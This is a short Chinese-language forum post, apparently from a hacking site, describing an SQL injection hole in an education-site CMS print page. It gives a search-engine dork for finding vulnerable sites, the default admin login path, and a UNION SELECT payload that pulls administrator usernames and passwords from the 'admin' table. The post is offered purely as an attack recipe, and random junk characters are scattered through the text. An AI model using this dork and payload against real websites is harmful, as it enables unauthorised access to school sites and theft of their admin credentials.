教育站打印页面漏洞 {& d: f4 J# z7 @
百度或google搜索 inurl:info_Print.asp?ArticleID=2 H9 a B* \- `. j* B! b$ p
默认后台:/ad_login.asp
) o( }) S1 j1 d3 ^6 e$ }- @爆管理员密码:
4 y: W! V( K; @$ j在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可3 w; Z: H% c' J0 m2 Y: B
8 I/ n) S% y! y0 j' N- A0 M; o wunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin _% I. V1 Y+ j% u
0 A t1 G6 E: c) V8 C! ^8 {" ^作者:佚名
. c- r h! {; R
. M4 d7 ]# a& ?6 W . y7 q4 E6 ^: c8 e5 }
|